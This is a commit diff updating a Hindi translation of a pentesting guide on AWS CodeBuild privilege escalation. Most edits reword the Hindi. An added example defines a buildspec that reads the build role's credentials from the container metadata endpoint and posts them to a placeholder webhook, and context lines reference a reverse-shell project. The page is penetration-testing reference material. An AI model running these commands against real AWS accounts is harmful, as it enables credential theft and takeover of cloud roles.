Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

2025-12-27 05:03:31 -08:00 · 2025-01-08 20:44:45 +00:00
parent ad7f4121f2
commit e0ec507501
1 changed files with 48 additions and 14 deletions
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -12,7 +12,7 @@

 ### `codebuild:StartBuild` | `codebuild:StartBuildBatch`

-इनमें से किसी एक अनुमति के साथ एक नया buildspec के साथ एक निर्माण को ट्रिगर करना और परियोजना को सौंपे गए iam भूमिका का टोकन चुराना पर्याप्त है:
+इनमें से केवल एक अनुमति के साथ एक नया buildspec के साथ एक निर्माण को ट्रिगर करना और परियोजना के लिए असाइन किए गए iam भूमिका का टोकन चुराना पर्याप्त है:

 {{#tabs }}
 {{#tab name="StartBuild" }}
@@ -58,7 +58,7 @@ aws codebuild start-build-batch --project <project-name> --buildspec-override fi
 {{#endtab }}
 {{#endtabs }}

-**नोट**: इन दोनों कमांड के बीच का अंतर यह है:
+**नोट**: इन दो कमांड के बीच का अंतर यह है:

 - `StartBuild` एक विशिष्ट `buildspec.yml` का उपयोग करके एकल निर्माण कार्य को ट्रिगर करता है।
 - `StartBuildBatch` आपको अधिक जटिल कॉन्फ़िगरेशन के साथ निर्माण के बैच को शुरू करने की अनुमति देता है (जैसे कई निर्माणों को समानांतर में चलाना)।
@@ -67,7 +67,7 @@ aws codebuild start-build-batch --project <project-name> --buildspec-override fi

 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

-एक हमलावर जिसके पास **`iam:PassRole`, `codebuild:CreateProject`, और `codebuild:StartBuild` या `codebuild:StartBuildBatch`** अनुमतियाँ हैं, वह **किसी भी codebuild IAM भूमिका के लिए प्रिविलेज़ बढ़ा सकता है** एक चल रही भूमिका बनाकर।
+एक हमलावर जिसके पास **`iam:PassRole`, `codebuild:CreateProject`, और `codebuild:StartBuild` या `codebuild:StartBuildBatch`** अनुमतियाँ हैं, वह **किसी भी codebuild IAM भूमिका के लिए प्रिविलेज़ बढ़ा सकेगा** एक चल रही भूमिका बनाकर।

 {{#tabs }}
 {{#tab name="Example1" }}
@@ -133,6 +133,40 @@ aws codebuild create-project --name reverse-shell-project --source type=S3,locat
 # Start a build with the new project
 aws codebuild start-build --project-name reverse-shell-project

+```
+{{#endtab }}
+
+{{#tab name="Example3" }}
+```bash
+# Generated by ex16x41, tested
+# Create a hook.json file with command to send output from curl credentials URI to your webhook address
+
+{
+"name": "user-project-1",
+"source": {
+"type": "NO_SOURCE",
+"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n      - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER",
+"image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0",
+"computeType": "BUILD_GENERAL1_SMALL"
+},
+"serviceRole": "ARN-OF-TARGET-ROLE"
+}
+
+# Create a new CodeBuild project with the hook.json file
+aws codebuild create-project --cli-input-json file:///tmp/hook.json
+
+# Start a build with the new project
+aws codebuild start-build --project-name user-project-1
+
+# Get Credentials output to webhook address
+Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from
+
 ```
 {{#endtab }}
 {{#endtabs }}
@@ -140,13 +174,13 @@ aws codebuild start-build --project-name reverse-shell-project
 **संभावित प्रभाव:** किसी भी AWS Codebuild भूमिका के लिए सीधे प्रिवेस्क।

 > [!WARNING]
-> एक **Codebuild कंटेनर** में फ़ाइल `/codebuild/output/tmp/env.sh` सभी env vars को शामिल करती है जो **metadata credentials** तक पहुँचने के लिए आवश्यक हैं।
+> एक **Codebuild कंटेनर** में फ़ाइल `/codebuild/output/tmp/env.sh` सभी env vars को शामिल करती है जो **मेटाडेटा क्रेडेंशियल्स** तक पहुँचने के लिए आवश्यक हैं।

-> इस फ़ाइल में **env variable `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** है जो **URL path** को credentials तक पहुँचने के लिए शामिल करता है। यह कुछ इस तरह होगा `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`
+> इस फ़ाइल में **env वेरिएबल `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`** शामिल है जो क्रेडेंशियल्स तक पहुँचने के लिए **URL पथ** को शामिल करता है। यह कुछ इस तरह होगा `/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420`

-> इसे URL **`http://169.254.170.2/`** में जोड़ें और आप भूमिका के credentials को डंप करने में सक्षम होंगे।
+> इसे URL **`http://169.254.170.2/`** में जोड़ें और आप भूमिका क्रेडेंशियल्स को डंप करने में सक्षम होंगे।

-> इसके अलावा, इसमें **env variable `ECS_CONTAINER_METADATA_URI`** भी है जो **container के बारे में metadata जानकारी प्राप्त करने के लिए पूर्ण URL** को शामिल करता है।
+> इसके अलावा, इसमें **env वेरिएबल `ECS_CONTAINER_METADATA_URI`** भी शामिल है जो **कंटेनर के बारे में मेटाडेटा जानकारी प्राप्त करने के लिए पूर्ण URL** को शामिल करता है।

 ### `iam:PassRole`, `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

@@ -184,11 +218,11 @@ aws codebuild update-project --cli-input-json file://$REV_PATH

 aws codebuild start-build --project-name codebuild-demo-project
 ```
-**संभावित प्रभाव:** किसी भी AWS Codebuild भूमिका के लिए सीधे प्रिवेस्क।
+**संभावित प्रभाव:** किसी भी AWS Codebuild भूमिका के लिए सीधे प्रिविलेज़ वृद्धि।

 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)

-पिछले अनुभाग की तरह लेकिन **`iam:PassRole` अनुमति के बिना**, आप इस अनुमति का दुरुपयोग करके **मौजूदा Codebuild परियोजनाओं को संशोधित कर सकते हैं और उस भूमिका तक पहुँच सकते हैं जो पहले से ही असाइन की गई है**।
+पिछले अनुभाग की तरह लेकिन **`iam:PassRole` अनुमति के बिना**, आप इस अनुमति का दुरुपयोग करके **मौजूदा Codebuild परियोजनाओं को संशोधित कर सकते हैं और उस भूमिका तक पहुँच प्राप्त कर सकते हैं जो पहले से ही असाइन की गई है**।

 {{#tabs }}
 {{#tab name="StartBuild" }}
@@ -264,7 +298,7 @@ aws codebuild start-build-batch --project-name codebuild-demo-project
 {{#endtab }}
 {{#endtabs }}

-**संभावित प्रभाव:** जुड़े हुए AWS Codebuild भूमिकाओं के लिए सीधे प्रिवेस्क।
+**संभावित प्रभाव:** जुड़े हुए AWS Codebuild भूमिकाओं के लिए सीधे प्रिवेलेज़ वृद्धि।

 ### SSM

@@ -291,7 +325,7 @@ For more info [**check the docs**](https://docs.aws.amazon.com/codebuild/latest/

 एक हमलावर जो एक विशेष CodeBuild प्रोजेक्ट का निर्माण शुरू/पुनः प्रारंभ करने में सक्षम है, जो अपने `buildspec.yml` फ़ाइल को एक S3 बकेट पर संग्रहीत करता है, जिसमें हमलावर को लिखने की अनुमति है, CodeBuild प्रक्रिया में कमांड निष्पादन प्राप्त कर सकता है।

-Note: यह वृद्धि केवल तभी प्रासंगिक है जब CodeBuild कार्यकर्ता की भूमिका हमलावर की भूमिका से भिन्न हो, उम्मीद है कि अधिक विशेषाधिकार प्राप्त हो।
+Note: यह वृद्धि केवल तभी प्रासंगिक है जब CodeBuild कार्यकर्ता की भूमिका हमलावर की भूमिका से भिन्न हो, जो कि अधिक विशेषाधिकार प्राप्त हो।
 ```bash
 aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

@@ -320,10 +354,10 @@ commands:
 **प्रभाव:** AWS CodeBuild कार्यकर्ता द्वारा उपयोग की जाने वाली भूमिका में सीधे प्रिविलेज़ वृद्धि, जो आमतौर पर उच्च प्रिविलेज़ रखती है।

 > [!WARNING]
-> ध्यान दें कि buildspec को ज़िप प्रारूप में अपेक्षित किया जा सकता है, इसलिए एक हमलावर को डाउनलोड, अनज़िप, `buildspec.yml` को रूट निर्देशिका से संशोधित करना, फिर से ज़िप करना और अपलोड करना होगा।
+> ध्यान दें कि buildspec को ज़िप प्रारूप में अपेक्षित किया जा सकता है, इसलिए एक हमलावर को डाउनलोड, अनज़िप, रूट निर्देशिका से `buildspec.yml` को संशोधित करना, फिर से ज़िप करना और अपलोड करना होगा।

-अधिक विवरण [यहां](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) मिल सकते हैं।
+अधिक विवरण [यहाँ](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/) मिल सकते हैं।

-**संभावित प्रभाव:** संलग्न AWS Codebuild भूमिकाओं में सीधे प्रिविलेज़ वृद्धि।
+**संभावित प्रभाव:** जुड़े हुए AWS Codebuild भूमिकाओं में सीधे प्रिविलेज़ वृद्धि।

 {{#include ../../../banners/hacktricks-training.md}}